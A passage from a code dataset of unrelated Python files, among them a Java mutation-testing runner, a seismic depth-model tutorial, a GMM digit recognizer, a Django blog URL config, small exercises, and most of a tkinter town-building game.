os.listdir(junitLocation):\n classpath.append(junitLocation + file)\n\n classpath = ':'.join(classpath)\n\n # mute all the irrelevant stuff\n with open(os.devnull, 'wb') as devnull:\n # check initial test and source files\n try:\n print('compiling source and test files...')\n\n if subprocess.call([compiler, sourceFilePath, '-cp', classpath], stdout=devnull):\n raise Exception('source file cannot be compiled, fix the code first')\n\n if subprocess.call([compiler, testFilePath, '-cp', classpath], stdout=devnull):\n raise Exception('test file cannot be compiled, fix the code first')\n \n print('compilation successful')\n except Exception as e:\n print(e.args[0])\n exit(1)\n\n # generate mutants\n sourceFileDir, sourceFileName = os.path.split(sourceFilePath)\n os.chdir(sourceFileDir)\n\n if not os.path.exists(mutantsDirectory):\n os.makedirs(mutantsDirectory)\n elif os.listdir(mutantsDirectory):\n print('Directory with mutants not empty. Please, remove old mutants first')\n exit(1)\n\n fileParser = JavaParser()\n parsedFile = fileParser.parse(sourceFileName)\n\n print('---------------------')\n print('creating mutants...')\n for operator in [AOR, LCR, ROR, ABS, UOI]:\n operator(sourceFileName, parsedFile)\n\n # run tests on mutants\n testFileDir, testFileName = os.path.split(testFilePath)\n bareTestFileName, testFileExt = os.path.splitext(testFileName)\n\n os.rename(sourceFileName, originalBupFile)\n\n killedMutants = []\n notKilledMutants = []\n invalidMutants = []\n\n for mutantFile in os.listdir(mutantsDirectory):\n print('---------------------')\n print('processing mutant {0}'.format(mutantFile))\n \n subprocess.call(['mv', mutantsDirectory + mutantFile, sourceFileName], stdout=devnull)\n \n if subprocess.call([compiler, sourceFilePath, '-cp', classpath], stdout=devnull, stderr=devnull) == 0:\n print(' mutant valid, testing...')\n testClassName = parsedFile['package'] and '.'.join([parsedFile['package'], bareTestFileName]) or bareTestFileName\n\n if subprocess.call(['java', '-cp', classpath, 'org.junit.runner.JUnitCore', testClassName], stdout=devnull):\n print(' mutant killed')\n killedMutants.append(mutantFile)\n else:\n print(' mutant not killed or equivalent')\n notKilledMutants.append(mutantFile)\n else: # invalid mutant\n print(' mutant invalid, discarding')\n invalidMutants.append(mutantFile)\n \n subprocess.call(['mv', sourceFileName, mutantsDirectory + mutantFile], stdout=devnull)\n\n os.rename(originalBupFile, sourceFileName)\n \n # results\n mutationScore = len(killedMutants) * 100 / (len(killedMutants) + len(notKilledMutants))\n print('=====================')\n print('killed mutants: {0}\\n{1}'.format(len(killedMutants), '\\n'.join([' {0}'.format(a) for a in killedMutants])))\n print('not killed mutants: {0}\\n{1}'.format(len(notKilledMutants), '\\n'.join([' {0}'.format(a) for a in notKilledMutants])))\n print('invalid mutants: {0}\\n{1}'.format(len(invalidMutants), '\\n'.join([' {0}'.format(a) for a in invalidMutants])))\n print('---------------------')\n print('mutation score: {0}%'.format(mutationScore))","sub_path":"jMutagen.py","file_name":"jMutagen.py","file_ext":"py","file_size_in_byte":5135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62661632","text":"from __future__ import print_function\nfrom srfpython import *\n\n# -----------------------\n# create 1-D depth model using 4 arrays with same length\n# -----------------------\n# top layers array first at 0, positive, growing, km\nztop = np.linspace(0., 2.8, 50)\n\n# vs in km/s\nvs = (3.5 - .86) / (ztop[-1] - ztop[0]) * (ztop - 0.) + .86 + \\\n -.7 * np.exp(-ztop / .1) + \\\n .08 * np.cos(2. * np.pi * ztop / .5) + \\\n .2 * np.sin(2. * np.pi * ztop / 1.) + \\\n .1 * np.cos(2. * np.pi * ztop / 2.) + \\\n .15 * np.cos(2. * np.pi * ztop / 3.)\n\nvp, rh = brocher2005(vs)\n\n# create the depthmodel object, use a subclass that is to be intitiated with arrays\n# see also depthmodel, depthmodel1D, depthmodel_from_mod96, ...\ndm = depthmodel_from_arrays(ztop, vp, vs, rh)\n\n# __str__ returns the file content at mod96 format, (see Herrmann CPS documentation)\nprint(dm)\n\ndm.write96('model000.mod96')\n","sub_path":"tutorials/00_simple_dispersion_example/01_using_python_programs/000_create_dephmodel.py","file_name":"000_create_dephmodel.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"543864659","text":"import glob\nimport numpy as np\nimport sklearn.model_selection\nimport datetime\n\nfrom Classes.Analyzer import *\n\n\ndef flatten(iterable):\n return [y for x in iterable for y in x]\n\n\ndef get_train_files():\n \"\"\" Get list of wav files in the train directory \"\"\"\n return glob.glob('../train/*.wav')\n\n\ndef get_eval_files():\n return glob.glob('../eval/*.wav')\n\n\ndef get_speaker_data(files):\n \"\"\" Get speaker data \"\"\"\n speaker_data = {}\n\n for file in files:\n info = FileInfo(file)\n param = FileParameters(info)\n\n if param.get_speaker() not in speaker_data:\n speaker_data[param.get_speaker()] = []\n\n speaker_data[param.get_speaker()].append(param)\n\n return speaker_data\n\n\ndef get_gmm_models(data, cross_validation=True):\n \"\"\" Get GMM models for each of numbers \"\"\"\n\n if cross_validation:\n kf = sklearn.model_selection.KFold(n_splits=len(data) // 2)\n\n all_models = []\n all_tests_data = []\n\n for train_idx, test_idx in kf.split(data):\n train_data = []\n for idx in train_idx:\n train_data.append(data[list(data.keys())[idx]])\n\n test_data = []\n for idx in test_idx:\n test_data.append(data[list(data.keys())[idx]])\n\n train_data = flatten(train_data)\n test_data = flatten(test_data)\n\n all_tests_data.append(test_data)\n\n models = []\n for i in range(10):\n combined_mfcc = None\n current_num_params = list(filter(lambda p: p.get_rec_num() == i, train_data))\n\n for param in current_num_params:\n if combined_mfcc is None:\n combined_mfcc = param.mfcc\n else:\n combined_mfcc = np.concatenate((combined_mfcc, param.mfcc))\n\n models.append(GmmModel(combined_mfcc, i))\n\n all_models.append(models)\n\n return all_models, all_tests_data\n else:\n models = []\n\n train_data = flatten(data.values())\n\n for i in range(10):\n combined_mfcc = None\n current_num_params = list(filter(lambda p: p.get_rec_num() == i, train_data))\n\n for param in current_num_params:\n if combined_mfcc is None:\n combined_mfcc = param.mfcc\n else:\n combined_mfcc = np.concatenate((combined_mfcc, param.mfcc))\n\n models.append(GmmModel(combined_mfcc, i))\n\n return models\n\n\ndef get_recognition_ratio(all_models, all_tests, suffix=''):\n results_file = open('../results/results_{}{}.txt'.format(datetime.datetime.now().strftime(\"%H_%M_%S\"), suffix), 'w+')\n results_file.truncate(0)\n\n all_count = sum([len(x) for x in all_tests])\n correct_count = 0\n\n for models, tests in zip(all_models, all_tests):\n for entry in tests:\n logs = []\n nums = []\n\n for model in models:\n logs.append(model.gmm.score(entry.mfcc))\n nums.append(model.number)\n\n idx = logs.index(max(logs))\n\n if nums[idx] == entry.get_rec_num():\n correct_count += 1\n\n results_file.write('{},{},{:.2f}\\n'.format(entry.file_info.file_name[9:], nums[idx], max(logs)))\n\n rr = correct_count / all_count\n\n results_file.write('RR: {:.2f}'.format(rr))\n print(rr)\n results_file.close()\n\n return rr\n\n\ndef recognize(models, tests):\n results_file = open('../results/results_with_tests_{}.txt'.format(datetime.datetime.now().strftime(\"%H_%M_%S\")), 'w+')\n results_file.truncate(0)\n\n for test in tests:\n logs = []\n nums = []\n\n for model in models:\n logs.append(model.gmm.score(test.mfcc))\n nums.append(model.number)\n\n idx = logs.index(max(logs))\n results_file.write('{},{},{:.2f}\\n'.format(test.file_info.file_name[8:], nums[idx], max(logs)))\n\n results_file.close()\n\n\ndef main():\n # files = get_train_files()\n # eval_files = get_eval_files()\n # speaker_data = get_speaker_data(files)\n # # all_models, all_tests_data = get_gmm_models(speaker_data) # Models for all of the numbers from (0-9)\n # # get_recognition_ratio(all_models, all_tests_data, '_cov_spherical')\n #\n # models = get_gmm_models(speaker_data, cross_validation=False)\n # tests = get_speaker_data(eval_files)\n # print('dupa')\n # recognize(models, flatten(tests.values()))\n\n # Testing\n\n from eval import evaluate\n\n\n files = get_train_files()\n eval_files = get_eval_files()\n speaker_data = get_speaker_data(files)\n all_models, all_tests_data = get_gmm_models(speaker_data)\n models = get_gmm_models(speaker_data, cross_validation=False)\n tests = get_speaker_data(eval_files)\n #recognize(models, flatten(tests.values()))\n evaluate('dupa.txt')\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Projekt 01/scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"206988122","text":"def square(number):\n return number * number\n\nsq=square\nprint(sq(2))\nliste=[2,4,5,6,7,8,9]\nnewList =[sq(i)for i in liste]\nprint(newList)\nnumberssq = list(map(square,liste))\nprint(numberssq)\ndef fact(number):\n if number <=1:\n return 1\n else:\n return number*fact(number-1)\n\nnumberfact = list(map(fact,liste))\nprint(numberfact)","sub_path":"More On Functions.py","file_name":"More On Functions.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"37351181","text":"#!D:\\PYTHON37\\python.exe\n\n\nimport pymysql\n\ndb = pymysql.connect(\"localhost\",\"root\", \"\", \"pythondb\")\n\ncursor = db.cursor()\n\n##Update\n##sql = \"UPDATE TestTable SET Age = 30 WHERE Name = 'Bob'\"\n\n##Deletion\nsql = \"DELETE FROM TestTable WHERE Name = 'Bob'\"\n\ntry:\n cursor.execute(sql)\n\n db.commit()\nexcept:\n db.rollback()\n\n\n \n\ndb.close()\n","sub_path":"database-update.py","file_name":"database-update.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"539911533","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import handler404\nfrom blog import views\n\nhandler404 = views.handler404\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',views.home),\n path('about/',views.about,name='about'),\n path('contact/',views.contact,name='contact'),\n path('login/',views.user_login,name='login'),\n path('logout/',views.user_logout,name='logout'),\n path('dashboard/',views.dashboard,name='dashboard'),\n path('signup/',views.user_signup,name='signup'),\n path('addpost/',views.add_post,name = 'addpost'),\n path('updatepost//',views.update_post,name= 'updatepost'),\n path('delete//',views.delete_post,name = 'deletepost'),\n]\n","sub_path":"miniblog/miniblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431334665","text":"# Напишіть програму, яка пропонує користувачу ввести \n# ціле число і визначає чи це число парне чи непарне, \n# чи введені дані корек��ні.\n\n# try:\n# num = int(input('Enter your number: '))\n# except ValueError:\n# print('You entered the wrong data.')\n\n# if num%2 == 0:\n# print('Even')\n# else:\n# print('Odd')\n\n##################################@@@@@@@@@@@@@@@@@@@##########\nn = input('Enter your number: ')\nwhile type(n) != int:\n try:\n n = int(n)\n except ValueError:\n print('\\n You entered the wrong data.\\n')\n n = input('Enter your number: ')\n\nif n%2 == 0:\n print('Even')\nelse:\n print('Odd')\n#################################################################\n# class NegValException(Exception):\n# pass\n\n# try:\n# val = int(input(\"input positive number: \"))\n# if val < 0:\n# raise NegValException(\"Neg val: \" + str(val))\n# print(val + 10)\n# except NegValException as e:\n# print(e)\n\n# try:\n# val = int(input(\"input number: \"))\n# tmp = 10 / val\n# print(tmp)\n# except:\n# print(\"Exception\")\n# finally:\n# print(\"Finally code\")","sub_path":"Home_work/9_1.py","file_name":"9_1.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"231014189","text":"from cmu_112_graphics import *\nimport basic_graphics, time, random\nimport objects, frames, message, play, astar, disaster\nfrom dataclasses import make_dataclass\n\n# meso is the main file for running the game\n\n# GENERAL CITATIONS\n# color names from http://www.science.smith.edu/dftwiki/index.php/Color_Charts_for_TKinter\n# cmu 112 graphics from https://www.cs.cmu.edu/~112/notes/notes-graphics.html\n\nHuman = make_dataclass('Human', ['startRow', 'startCol', 'endRow', 'endCol', 'path'])\n\nclass WelcomeMode(Mode):\n def appStarted(mode):\n mode.townName = 'no'\n mode.buttonColor1 = 'palegreen'\n mode.buttonColor2 = 'pink'\n mode.width1 = 0\n mode.width2 = 0\n\n def redrawAll(mode, canvas):\n frames.Welcome.draw(mode, canvas)\n \n def mouseMoved(mode, event):\n x, y = event.x, event.y\n \n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 - 2*mode.app.boxY) and \n (y <= mode.app.height//2 - mode.app.boxY)):\n mode.buttonColor1 = 'limegreen'\n mode.width1 = 2\n else: \n mode.buttonColor1 = 'palegreen'\n mode.width1 = 0\n\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 + mode.app.boxY) and \n (y <= mode.app.height//2 + 2*mode.app.boxY)):\n mode.buttonColor2 = 'lightcoral'\n mode.width2 = 2\n\n else:\n mode.buttonColor2 = 'pink'\n mode.width2 = 0\n\n def mousePressed(mode, event):\n x, y = event.x, event.y\n # first time, needs to make a choice\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 - 2*mode.app.boxY) and \n (y <= mode.app.height//2 - mode.app.boxY)):\n if (mode.app.create == None):\n mode.app.setActiveMode(mode.app.chooseMode)\n else:\n mode.app.setActiveMode(mode.app.gameMode)\n\n elif ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 + mode.app.boxY) and \n (y <= mode.app.height//2 + 2*mode.app.boxY)):\n mode.app.setActiveMode(mode.app.instructsMode)\n\nclass InstructsMode(Mode):\n def appStarted(mode):\n mode.margin = 20\n mode.buttonColor3 = 'paleturquoise'\n mode.width3 = 0\n mode.buttonColor5 = 'palegreen'\n mode.width5 = 0\n mode.boxHeight = mode.height - 6*mode.margin\n \n def redrawAll(mode, canvas):\n frames.Instructs.draw(mode, canvas)\n\n # CITATION for mouseMoved: https://www.cs.cmu.edu/~112/notes/notes-animations-part3.html\n def mouseMoved(mode, event):\n x, y = event.x, event.y\n\n # hover on back button\n if ((x >= mode.app.width//2 - mode.app.backX) and \n (x <= mode.app.width//2 + mode.app.backX) and \n (y >= mode.app.backHeight - mode.app.backY) and \n (y <= mode.app.backHeight + mode.app.backY)):\n mode.buttonColor3 = 'mediumturquoise'\n mode.width3 = 2\n else:\n mode.buttonColor3 = 'paleturquoise'\n mode.width3 = 0\n \n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.boxHeight - mode.app.boxY) and \n (y <= mode.boxHeight)):\n mode.buttonColor5 = 'limegreen'\n mode.width5 = 2\n else:\n mode.buttonColor5 = 'palegreen'\n mode.width5 = 0\n\n def mousePressed(mode, event):\n x, y = event.x, event.y\n\n # go back\n if ((x >= mode.app.width//2 - mode.app.backX) and \n (x <= mode.app.width//2 + mode.app.backX) and \n (y >= mode.app.backHeight - mode.app.backY) and \n (y <= mode.app.backHeight + mode.app.backY)):\n mode.app.setActiveMode(mode.app.welcomeMode)\n\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.boxHeight - mode.app.boxY) and \n (y <= mode.boxHeight)):\n if (mode.app.create == None):\n mode.app.setActiveMode(mode.app.chooseMode)\n else:\n mode.app.setActiveMode(mode.app.gameMode)\n\nclass ChooseMode(Mode):\n\n def appStarted(mode):\n CreateMode.objectInfo(mode)\n mode.buttonColor1 = 'palegreen'\n mode.buttonColor2 = 'pink'\n mode.buttonColor3 = 'paleturquoise'\n mode.width1 = 0\n mode.width2 = 0\n mode.width3 = 0\n \n def redrawAll(mode, canvas):\n frames.Choose.draw(mode, canvas)\n \n def mouseMoved(mode, event):\n x, y = event.x, event.y\n \n # hover on first button\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 - 2*mode.app.boxY) and \n (y <= mode.app.height//2 - mode.app.boxY)):\n mode.buttonColor1 = 'limegreen'\n mode.width1 = 2\n else: \n mode.buttonColor1 = 'palegreen'\n mode.width1 = 0\n\n # hover on second button\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 + mode.app.boxY) and \n (y <= mode.app.height//2 + 2*mode.app.boxY)):\n mode.buttonColor2 = 'lightcoral'\n mode.width2 = 2\n else:\n mode.buttonColor2 = 'pink'\n mode.width2 = 0\n\n # hover on back button\n if ((x >= mode.app.width//2 - mode.app.backX) and \n (x <= mode.app.width//2 + mode.app.backX) and \n (y >= mode.app.backHeight - mode.app.backY) and \n (y <= mode.app.backHeight + mode.app.backY)):\n mode.buttonColor3 = 'mediumturquoise'\n mode.width3 = 2\n else:\n mode.buttonColor3 = 'paleturquoise'\n mode.width3 = 0\n \n def mousePressed(mode, event):\n x, y = event.x, event.y\n\n # self create\n if ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 - 2*mode.app.boxY) and \n (y <= mode.app.height//2 - mode.app.boxY)):\n mode.app.create = True\n mode.app.setActiveMode(mode.app.createMode)\n \n # auto create\n elif ((x >= mode.app.width//2 - mode.app.boxX) and \n (x <= mode.app.width//2 + mode.app.boxX) and \n (y >= mode.app.height//2 + mode.app.boxY) and \n (y <= mode.app.height//2 + 2*mode.app.boxY)):\n mode.app.create = False\n objects.RandomMap.getMap(mode)\n mode.app.setActiveMode(mode.app.gameMode)\n\n # go back\n elif ((x >= mode.app.width//2 - mode.app.backX) and \n (x <= mode.app.width//2 + mode.app.backX) and \n (y >= mode.app.backHeight - mode.app.backY) and \n (y <= mode.app.backHeight + mode.app.backY)):\n mode.app.setActiveMode(mode.app.welcomeMode)\n\nclass CreateMode(Mode):\n\n def appStarted(mode):\n mode.tipiUnlocked = mode.houseUnlocked = mode.skyscraperUnlocked = mode.treeUnlocked = False\n mode.humans = []\n mode.objectInfo()\n mode.margin = 20\n mode.frameRightbound = 3*(mode.width/4) # 3*375 = 1125\n mode.infoWidth = mode.width - 2*mode.margin - mode.frameRightbound\n mode.infoMidX = mode.frameRightbound + mode.margin + mode.infoWidth/2\n mode.buttonR = 50\n mode.townName = 'town'\n\n mode.year = 0\n mode.population = 0\n\n # instruction bools\n\n mode.lakeMessage = True\n mode.mountainMessage = False\n mode.houseMessage = False\n mode.treeMessage = False\n mode.startMessage = False\n\n mode.placingLake = False\n mode.placingMountains = False\n mode.placingHomes = False\n mode.placingTrees = False\n\n mode.messageMidX = mode.margin + 160\n mode.messageMidY = mode.margin + 30\n\n # button info\n mode.buttonColor4 = 'palegreen'\n mode.width4 = 0\n mode.tipiOutline = mode.houseOutline = mode.skyscraperOutline = mode.treeOutline = 'white'\n \n def objectInfo(mode):\n mode.margin = 20\n mode.frameRightbound = 3*(mode.width/4)\n mode.signX = 3*mode.margin\n mode.signY = mode.height/2\n mode.lakeRX = 120\n mode.lakeRY = 80\n mode.mountainR = 80\n mode.treeR = 20\n mode.objectR = 5\n mode.tipiR = 25\n mode.houseR = 15\n mode.skyscraperR = 25\n \n # CITATIONS\n # grass jpeg: https://depositphotos.com/128558532/stock-photo-green-grass-background-texture.html\n # lake png: https://www.seekpng.com/ipng/u2q8o0r5e6e6y3a9_lake-png-transparent-image-lake-clipart-transparent-background/\n # mountain png: https://www.cleanpng.com/png-sugarloaf-mountain-computer-icons-mountain-699724/\n # tree png: http://clipart-library.com/free/pine-tree-clipart-png.html\n # tipi png: https://www.pngwing.com/en/free-png-zopse\n # house png: https://www.flaticon.com/free-icon/medieval-house_509843#\n # skyscraper png: https://www.pngegg.com/en/png-bcubn\n\n # images\n mode.grassIMG = mode.loadImage('grass.jpg')\n mode.treeIMG = mode.loadImage('tree.png')\n mode.treeIMG = mode.scaleImage(mode.treeIMG, 1/4)\n mode.mountainIMG = mode.loadImage('mountain.png')\n mode.mountainIMG = mode.scaleImage(mode.mountainIMG, 1/6)\n mode.lakeIMG = mode.loadImage('lake.png')\n mode.lakeIMG = mode.scaleImage(mode.lakeIMG, 1/2)\n mode.tipiIMG = mode.loadImage('tipi.png')\n mode.houseIMG = mode.loadImage('house.png')\n mode.houseIMG = mode.scaleImage(mode.houseIMG, 1/2)\n mode.skyscraperIMG = mode.loadImage('skyscraper.png')\n\n # draw images (i drew these on my ipad!)\n mode.drawWelcome = mode.loadImage('drawWelcome.png')\n mode.drawWelcome = mode.scaleImage(mode.drawWelcome, 1/3)\n mode.drawTipi = mode.loadImage('drawtipi.png')\n mode.drawTipi = mode.scaleImage(mode.drawTipi, 1/3)\n mode.drawHouse = mode.loadImage('drawhouse.png')\n mode.drawHouse = mode.scaleImage(mode.drawHouse, 1/3)\n mode.drawSkyscraper = mode.loadImage('drawskyscraper.png')\n mode.drawSkyscraper = mode.scaleImage(mode.drawSkyscraper, 1/3)\n mode.drawPandemic = mode.loadImage('drawpandemic.png')\n mode.drawPandemic = mode.scaleImage(mode.drawPandemic, 1/3)\n mode.drawFamine = mode.loadImage('drawfamine.png')\n mode.drawFamine = mode.scaleImage(mode.drawFamine, 1/3)\n mode.drawFire = mode.loadImage('drawfire.png')\n mode.drawFire = mode.scaleImage(mode.drawFire, 1/3)\n mode.drawEarthquake = mode.loadImage('drawearthquake.png')\n mode.drawEarthquake = mode.scaleImage(mode.drawEarthquake, 1/3)\n mode.drawEnd = mode.loadImage('drawend.png')\n mode.drawEnd = mode.scaleImage(mode.drawEnd, 1/3)\n \n def mouseMoved(mode, event):\n (x,y) = (event.x, event.y)\n # view instructions\n if ((x >= mode.infoMidX - 60) and \n (x <= mode.infoMidX + 60) and \n (y >= mode.height - 80) and \n (y <= mode.height - 60)):\n mode.buttonColor4 = 'limegreen'\n mode.width4 = 2\n else:\n mode.buttonColor4 = 'palegreen'\n mode.width4 = 0\n\n def mousePressed(mode, event):\n\n (x,y) = (event.x, event.y)\n # view instructions\n if ((x >= mode.infoMidX - 60) and \n (x <= mode.infoMidX + 60) and \n (y >= mode.height - 80) and \n (y <= mode.height - 60)):\n mode.app.setActiveMode(mode.app.instructsMode)\n\n # placing lake\n if mode.lakeMessage:\n mode.placingLake = True\n if mode.placingLake and play.Play.isValid(mode, x, y, mode.lakeRX):\n objects.Lake.lake = (x,y)\n mode.placingLake = False\n mode.placingMountains = True\n mode.lakeMessage = False\n mode.mountainMessage = True\n \n # placing mountains\n elif mode.placingMountains and play.Play.isValid(mode, x, y, mode.mountainR):\n objects.Mountain.mountains.append((x, y))\n if len(objects.Mountain.mountains) == 2:\n mode.mountainMessage = False\n mode.houseMessage = True\n mode.placingMountains = not mode.placingMountains\n mode.placingHomes = not mode.placingHomes\n\n # placing homes\n elif mode.placingHomes and play.Play.isValid(mode, x, y, mode.tipiR):\n objects.Tipi.tipis.append((x, y))\n if len(objects.Tipi.tipis) == 10:\n mode.houseMessage = False\n mode.treeMessage = True\n mode.placingHomes = False\n mode.placingTrees = True\n\n # placing trees\n elif mode.placingTrees and play.Play.isValid(mode, x, y, mode.treeR):\n objects.Tree.trees.append((x, y))\n if len(objects.Tree.trees) >= 10:\n mode.treeMessage = False\n mode.placingTrees = False\n mode.move = True\n mode.version = 0\n mode.startMessage = True\n mode.app.setActiveMode(mode.app.gameMode)\n\n def redrawAll(mode, canvas):\n frames.Frame.draw(mode, canvas)\n frames.Info.draw(mode, canvas, mode.year, mode.population)\n\n objects.WelcomeSign.draw(mode, canvas)\n objects.Lake.draw(mode, canvas)\n objects.Mountain.draw(mode, canvas)\n objects.Tipi.draw(mode, canvas)\n objects.Tree.draw(mode, canvas)\n\n if mode.app.createMode:\n message.Message.draw(mode, canvas)\n\nclass GameMode(Mode):\n def appStarted(mode):\n\n #bools\n mode.paused = True\n mode.move = False\n mode.townName = 'town'\n mode.gameEnd = False\n\n # info\n mode.year = 0\n mode.population = 0\n\n # button info\n mode.buttonColor4 = 'palegreen'\n mode.width4 = 0\n mode.tipiOutline = 'white'\n mode.houseOutline = 'white'\n mode.skyscraperOutline = 'white'\n mode.treeOutline = 'white'\n\n # new objects\n mode.addTipi = False\n mode.addHouse = False\n mode.addSkyscraper = False\n mode.addTree = False\n\n # frame info\n mode.margin = 20\n mode.frameRightbound = 3*(mode.width/4) # 3*375 = 1125\n \n mode.infoWidth = mode.width - 2*mode.margin - mode.frameRightbound\n mode.infoMidX = mode.frameRightbound + mode.margin + mode.infoWidth/2\n mode.buttonR = 50\n\n mode.cellSize = 5\n mode.rows = 152\n mode.cols = 219\n mode.grid = [([0] * mode.cols) for row in range(mode.rows)]\n mode.humans = [[None, None, None, None] for i in range(5)]\n\n # messages\n mode.lakeMessage = mode.mountainMessage = mode.houseMessage = False\n mode.treeMessage = False\n mode.startMessage = True\n mode.messageMidX = mode.app.margin + 160\n mode.messageMidY = mode.app.margin + 30\n\n # progress window\n mode.game = mode.frameRightbound - mode.margin\n mode.windowX = (mode.frameRightbound - mode.margin) // 2\n mode.windowY = mode.height // 2\n mode.windowXR = 350\n mode.windowYR = 250\n mode.windowOn = True\n mode.message1 = False\n mode.message2 = False\n mode.version = 0\n\n # more bools for the interactive buttons\n mode.tipiUnlocked = False\n mode.houseUnlocked = False\n mode.skyscraperUnlocked = False\n mode.treeUnlocked = False\n\n # initialize game\n CreateMode.objectInfo(mode)\n mode.townName = mode.getUserInput(\"What is the name of your town?\")\n mode.grid = astar.AStar.obstacles(mode)\n mode.humans = play.Play.getHumans(mode)\n mode.possibleDisasters = [None, 'pandemic', 'famine', 'wildfire', 'earthquake']\n\n def mouseMoved(mode, event):\n (x,y) = (event.x, event.y)\n \n # on tipi button\n if (mode.addTipi == False) and (mode.tipiUnlocked == True):\n if ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 200 - mode.buttonR) and\n (y <= 200 + mode.buttonR)):\n mode.tipiOutline = 'black'\n else:\n mode.tipiOutline = 'white'\n\n # on house button\n if (mode.addHouse == False) and (mode.houseUnlocked == True):\n if ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 350 - mode.buttonR) and\n (y <= 350 + mode.buttonR)):\n mode.houseOutline = 'black'\n else:\n mode.houseOutline = 'white'\n \n # on skyscraper button\n if (mode.addSkyscraper == False) and (mode.skyscraperUnlocked == True):\n if ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 500 - mode.buttonR) and\n (y <= 500 + mode.buttonR)):\n mode.skyscraperOutline = 'black'\n else:\n mode.skyscraperOutline = 'white'\n\n # on tree button\n if (mode.addTree == False) and (mode.treeUnlocked == True):\n if ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 650 - mode.buttonR) and\n (y <= 650 + mode.buttonR)):\n mode.treeOutline = 'black'\n else:\n mode.treeOutline = 'white'\n \n # view instructions\n if ((x >= mode.infoMidX - 60) and \n (x <= mode.infoMidX + 60) and \n (y >= mode.height - 80) and \n (y <= mode.height - 60)):\n mode.buttonColor4 = 'limegreen'\n mode.width4 = 2\n else:\n mode.buttonColor4 = 'palegreen'\n mode.width4 = 0\n \n # view instructions\n def mousePressed(mode, event):\n\n x, y = event.x, event.y\n\n # go to instructions\n if ((x >= mode.infoMidX - 60) and \n (x <= mode.infoMidX + 60) and \n (y >= mode.height - 80) and \n (y <= mode.height - 60)):\n mode.app.setActiveMode(mode.app.instructsMode)\n\n # choose tipi option\n elif ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 200 - mode.buttonR) and\n (y <= 200 + mode.buttonR) and\n (mode.tipiUnlocked == True)):\n mode.addTipi = True\n mode.tipiOutline = 'red'\n\n # add new tipi\n elif mode.addTipi == True:\n if play.Play.isValid(mode, x, y, mode.tipiR):\n objects.Tipi.tipis.append((x, y))\n mode.addTipi = False\n mode.tipiOutline = 'white'\n\n # choose house option\n elif ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 350 - mode.buttonR) and\n (y <= 350 + mode.buttonR) and\n (mode.houseUnlocked == True)):\n mode.addHouse = True\n mode.houseOutline = 'red'\n\n # add new house\n elif mode.addHouse == True:\n # upgrade existing tipi\n new = play.Play.upgradeTipi(mode, x, y)\n if new != None:\n objects.Tipi.tipis.remove(new)\n objects.House.houses.append(new)\n mode.addHouse = False\n mode.houseOutline = 'white'\n # add newHouse\n elif play.Play.isValid(mode, x, y, mode.houseR):\n objects.House.houses.append((x, y))\n mode.addHouse = False\n mode.houseOutline = 'white'\n \n # choose skyscraper option\n elif ((x >= mode.infoMidX - mode.buttonR) and \n (x <= mode.infoMidX + mode.buttonR) and\n (y >= 500 - mode.buttonR) and\n (y <= 500 + mode.buttonR) and\n (mode.skyscraperUnlocked == True)):\n mode.addSkyscraper = True\n mode.skyscraperOutline = 'red'\n\n # add new skyscraper\n elif mode.addSkyscraper == True:\n # upgrade existing house\n new = play.Play.upgradeHouse(mode, x, y)\n if new != None:\n objects.House.houses.remove(new)\n objects.Skyscraper.skyscrapers.append(new)\n mode.addSkyscraper = False\n mode.skyscraperOutline = 'white'\n deadTree = random.choice(objects.Tree.trees)\n objects.Tree.trees.remove(deadTree)\n # add new skyscraper\n elif play.Play.isValid(mode, x, y, mode.skyscraperR):\n objects.Skyscraper.skyscrapers.append((x, y))\n mode.addSkyscraper = False\n mode.skyscraperOutline = 'white'\n deadTree = random.choice(objects.Tree.trees)\n 